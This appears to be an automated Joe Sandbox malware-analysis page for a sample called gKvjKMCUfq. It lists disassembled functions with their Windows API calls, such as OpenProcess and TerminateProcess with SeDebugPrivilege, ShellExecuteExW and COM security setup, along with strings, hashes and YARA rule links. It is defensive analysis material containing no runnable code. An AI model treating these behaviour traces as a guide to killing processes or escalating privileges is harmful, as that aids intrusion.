Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: f9f8caa8a03ee572fccc6bbc7725e6410a1c111d02e5b340cc4e3df0e7797116
Instruction ID: cad4ec7177fd3b88dd6611aca6b2b76929ed03e8851562bb7310fe1e1527b0d9
Opcode Fuzzy Hash: f9f8caa8a03ee572fccc6bbc7725e6410a1c111d02e5b340cc4e3df0e7797116
Instruction Fuzzy Hash: 45C1B372A012599FDF10DF69D884BAEB7F5FF48314F148469EA05EB280E774AD40CBA0

Function 007E9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007E9167
VariantInit.OLEAUT32(?), ref: 007E9238
VariantInit.OLEAUT32(?), ref: 007E9339
VariantClear.OLEAUT32(?), ref: 007E9343
VariantClear.OLEAUT32(?), ref: 007E93A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 007E931C
Null Object assignment in FOR..IN loop, xrefs: 007E91C8, 007E92F6, 007E93AE

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 458fc25722e1ce97c790605c20354d5714a54c51f1f09ff345d5e729a9860fd3
Instruction ID: c51d299aaecfef469fd5294927227c6c68809538afc29a39d574065d0e94f6ef
Opcode Fuzzy Hash: 458fc25722e1ce97c790605c20354d5714a54c51f1f09ff345d5e729a9860fd3
Instruction Fuzzy Hash: 4891B372A01255EBDF24CFA6C848FAEB7B8FF49710F108119F615AB280D7789944CBA0

Function 007E975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 007C710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?,?,?,007C7455), ref: 007C7127
Part of subcall function 007C710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?,?), ref: 007C7142
Part of subcall function 007C710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?,?), ref: 007C7150
Part of subcall function 007C710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C7044,80070057,?), ref: 007C7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007E9806
_memset.LIBCMT ref: 007E9813
_memset.LIBCMT ref: 007E9956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007E9982
CoTaskMemFree.OLE32(?), ref: 007E998D

Strings

NULL Pointer assignment, xrefs: 007E99DB

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: f11b3c25e17c718a91bbdd9362abde2773e3d358f4afdcfb8d6238a7c8b1da8b
Instruction ID: a71454d13eeec8e17268d219c5ea4d01b1131f9e563116dd15a3a67ae92fd7a9
Opcode Fuzzy Hash: f11b3c25e17c718a91bbdd9362abde2773e3d358f4afdcfb8d6238a7c8b1da8b
Instruction Fuzzy Hash: 8D915972D01219EBDF10DFA5DC84EDEBBB9AF08350F10802AF519A7251DB75AA44CFA0

Function 007F6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007F6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 007F6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007F6E52
_wcscat.LIBCMT ref: 007F6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 007F6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007F6EF2

Strings

SysListView32, xrefs: 007F6DF6

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 13d1bb484520c1a4cc9397fd88a8f61d4250726cc726efed897a4f799d394422
Instruction ID: ae2ef781715c34f364194a0bb57eb0c3e9bcc2af5547b3902bd7805e7bc3c268
Opcode Fuzzy Hash: 13d1bb484520c1a4cc9397fd88a8f61d4250726cc726efed897a4f799d394422
Instruction Fuzzy Hash: AD418F75A00348EBDF219F64CC85BFA77E8EF08350F10442AF694E7291D6799D84CB64

Function 007EE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 007D3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 007D3C7A
Part of subcall function 007D3C55: Process32FirstW.KERNEL32(00000000,?), ref: 007D3C88
Part of subcall function 007D3C55: CloseHandle.KERNEL32(00000000), ref: 007D3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EE9A4
GetLastError.KERNEL32 ref: 007EE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 007EEA63
GetLastError.KERNEL32(00000000), ref: 007EEA6E
CloseHandle.KERNEL32(00000000), ref: 007EEAA3

Strings

SeDebugPrivilege, xrefs: 007EE9C2

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 51893cc542ae820d8c7cb975444ca914717971007ea1c4f7582674f35751c3fb
Instruction ID: 22543c59c65fda35e2d25290aa651ce7e0a31cb422153f506f48e3f0b57a1a60
Opcode Fuzzy Hash: 51893cc542ae820d8c7cb975444ca914717971007ea1c4f7582674f35751c3fb
Instruction Fuzzy Hash: 83419931200201DFDB10EF14CCA9F79B7A5AF44314F14C86CF9469B2C2CB78A804CB96

Function 007D2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 007D3033

Strings

warning, xrefs: 007D301C
stop, xrefs: 007D3004
info, xrefs: 007D2FD4
question, xrefs: 007D2FEC
blank, xrefs: 007D2FB5

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 5e013ac4fe51a5701ae2f86542b7495bc17284a37714fc58c3fa35623cbb77f4
Instruction ID: d79adb1f2003f452188e4eaf23cc9eeef426bc01d4a09d7afbaa5e79afa9155a
Opcode Fuzzy Hash: 5e013ac4fe51a5701ae2f86542b7495bc17284a37714fc58c3fa35623cbb77f4
Instruction Fuzzy Hash: BA112B31749346FEEB14AB54EC86CAB77BCDF15360B50002BF900A6382DB7D5F4155A6

Function 007D42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007D4312
LoadStringW.USER32(00000000), ref: 007D4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007D432F
LoadStringW.USER32(00000000), ref: 007D4336
_wprintf.LIBCMT ref: 007D435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 007D4357

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 27fdef8454f6962b1a8469100b2607e6d1c89f302d55d5dd5d4e146edc9813de
Instruction ID: dea67ae5438241b58525a796cecce5119978d44d0488f0335dccdf9f81170bcf
Opcode Fuzzy Hash: 27fdef8454f6962b1a8469100b2607e6d1c89f302d55d5dd5d4e146edc9813de
Instruction Fuzzy Hash: CB014FF290020CBFE71197A4DD89EF6776CEB08301F0045A2F745E2151EE785E858B78

Function 007FD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

GetSystemMetrics.USER32(0000000F), ref: 007FD47C
GetSystemMetrics.USER32(0000000F), ref: 007FD49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007FD6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007FD6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007FD716
ShowWindow.USER32(00000003,00000000), ref: 007FD735
InvalidateRect.USER32(?,00000000,00000001), ref: 007FD75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 007FD77D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 5add6150753d9f8264302cf8e488f6264933c6b811da987d71602dace6e1d6cc
Instruction ID: 4d046f68c6720f25e2bc5a66e29718e1a6c8eaef833b9518437eada84f0629f9
Opcode Fuzzy Hash: 5add6150753d9f8264302cf8e488f6264933c6b811da987d71602dace6e1d6cc
Instruction Fuzzy Hash: 5BB17C75600219EBDF24DF68C9857BD7BB2BF04711F088069EE489F295DB78AD50CB60

Function 00772A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC1C7,00000004,00000000,00000000,00000000), ref: 00772ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007AC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00772B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007AC1C7,00000004,00000000,00000000,00000000), ref: 007AC21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC1C7,00000004,00000000,00000000,00000000), ref: 007AC286

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 537bc7af1abcc18357c722d52669e367ce088075485cc10c9f376d510e8b5f2c
Instruction ID: b6487e0b086c7f6f1af8d816d53ac9cc10514579a77de547f682ad2467332c6e
Opcode Fuzzy Hash: 537bc7af1abcc18357c722d52669e367ce088075485cc10c9f376d510e8b5f2c
Instruction Fuzzy Hash: D7411B30604780FACF369B288C8DB7B7B92BF86350F65C919E46F86562CA3D9847D711

Function 007D70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 007D70DD

Part of subcall function 00790DB6: std::exception::exception.LIBCMT ref: 00790DEC
Part of subcall function 00790DB6: __CxxThrowException@8.LIBCMT ref: 00790E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007D7114
EnterCriticalSection.KERNEL32(?), ref: 007D7130
_memmove.LIBCMT ref: 007D717E
_memmove.LIBCMT ref: 007D719B
LeaveCriticalSection.KERNEL32(?), ref: 007D71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007D71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 007D71DE

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: c5575afbf2ba0d7ae2e7ca2d430d3a1f08d969171006c4bfac0382e234c273c8
Instruction ID: 9cf6300836ce834bd10b1405d0c8f6bf08f416037dc0c235a8e266808b144b22
Opcode Fuzzy Hash: c5575afbf2ba0d7ae2e7ca2d430d3a1f08d969171006c4bfac0382e234c273c8
Instruction Fuzzy Hash: ED315071900205EFCF10EFA5DC89AAEB778FF45710F1481A5E9049B256EB78DE14CBA4

Function 007F61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007F61EB
GetDC.USER32(00000000), ref: 007F61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007F61FE
ReleaseDC.USER32(00000000,00000000), ref: 007F620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007F6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007F6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007F902A,?,?,000000FF,00000000,?,000000FF,?), ref: 007F6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007F62B1

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: b83767fa54b2a420a500fe76d6036a5505f19c0b44b0e04a869a9fe657ab17b7
Instruction ID: 41c64f8b293eddcc6145305bd666b98f99596e69b08b4e5e302dd9b15907f55c
Opcode Fuzzy Hash: b83767fa54b2a420a500fe76d6036a5505f19c0b44b0e04a869a9fe657ab17b7
Instruction Fuzzy Hash: C5312D72101214BFEF118F54DC8AFFA3BA9FF49765F044065FE08DA291DA799841CB68

Function 007CBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 007CBBC4
_memcmp.LIBCMT ref: 007CBBE6
_memcmp.LIBCMT ref: 007CBBFE
_memcmp.LIBCMT ref: 007CBC11
_memcmp.LIBCMT ref: 007CBC2B
_memcmp.LIBCMT ref: 007CBC3E
_memcmp.LIBCMT ref: 007CBC56
_memcmp.LIBCMT ref: 007CBC71

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 80a2a7581dbd38ad6104edc5d3028806d30ef30cc6e223f1e8491e72f39bde8b
Instruction ID: f14e8b4c42a956d22bf7d35df46f1f9c68c20adf8921158caaf99918a8e411b8
Opcode Fuzzy Hash: 80a2a7581dbd38ad6104edc5d3028806d30ef30cc6e223f1e8491e72f39bde8b
Instruction Fuzzy Hash: 2C2104A160121ABBEA156B21AD47FBB735CEE14348F44402DFD0496A87EB6CDE2181F1

Function 007DEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

Part of subcall function 0078FC86: _wcscpy.LIBCMT ref: 0078FCA9

_wcstok.LIBCMT ref: 007DEC94
_wcscpy.LIBCMT ref: 007DED23
_memset.LIBCMT ref: 007DED56

Strings

X, xrefs: 007DED93

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 9561ad1bcabf497a0ea868989b43835d82a819a6b7c643fd4042a18993fbdf8b
Instruction ID: dcc12c2b75276f3fabb7736b8d5e2863c6f6c0c29771a9af20a7cb4cc3994c1f
Opcode Fuzzy Hash: 9561ad1bcabf497a0ea868989b43835d82a819a6b7c643fd4042a18993fbdf8b
Instruction Fuzzy Hash: 4DC17C71608300DFCB55EF24D849A5AB7F4EF45350F00892DF9999B3A2DB78E845CB92

Function 00771424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ee05e5e3813fc489c2049bf2879bac6fe6bb23acd18271d12ff7a9ddc4a638
Instruction ID: 4311deac3d65911dc51a75498914a5a4aac61f2b7bbe3cbcdac45ee01a0e4db5
Opcode Fuzzy Hash: 39ee05e5e3813fc489c2049bf2879bac6fe6bb23acd18271d12ff7a9ddc4a638
Instruction Fuzzy Hash: 46715C30900109EFCF14CF98CC89ABEBB79FF86350F54C159F919AA251C738AA51CB64

Function 007E6B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6ca5c268ac30b2105b9543508deafc3b669dce2b79911fad8eea9454d5678b
Instruction ID: d65d32bc36aa2d1c3e142fba308a7a8e1d644ea634e4621585dd48ec0433ba6e
Opcode Fuzzy Hash: ca6ca5c268ac30b2105b9543508deafc3b669dce2b79911fad8eea9454d5678b
Instruction Fuzzy Hash: EB61B171204340EBCB10EB25CC89E6FB7E8AF98754F50891DF5599B292DA78ED00C792

Function 007FB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(010C5DB0), ref: 007FB3EB
IsWindowEnabled.USER32(010C5DB0), ref: 007FB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007FB4DB
SendMessageW.USER32(010C5DB0,000000B0,?,?), ref: 007FB512
IsDlgButtonChecked.USER32(?,?), ref: 007FB54F
GetWindowLongW.USER32(010C5DB0,000000EC), ref: 007FB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007FB589

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: abcadb30ae778058bd756271fbd687b4092bd61b75b82decdff5f011dba6d46f
Instruction ID: c8d91dcf31a79e42a9d1ac84f01f9eb6f57996cefdd859ad336de3d59dda9d48
Opcode Fuzzy Hash: abcadb30ae778058bd756271fbd687b4092bd61b75b82decdff5f011dba6d46f
Instruction Fuzzy Hash: 03719034605248EFDB209F94C994FBABBB9FF49300F148469FB55973A2CB39A950CB50

Function 007EF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007EF448
_memset.LIBCMT ref: 007EF511
ShellExecuteExW.SHELL32(?), ref: 007EF556

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

Part of subcall function 0078FC86: _wcscpy.LIBCMT ref: 0078FCA9

GetProcessId.KERNEL32(00000000), ref: 007EF5CD
CloseHandle.KERNEL32(00000000), ref: 007EF5FC

Strings

@, xrefs: 007EF525

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
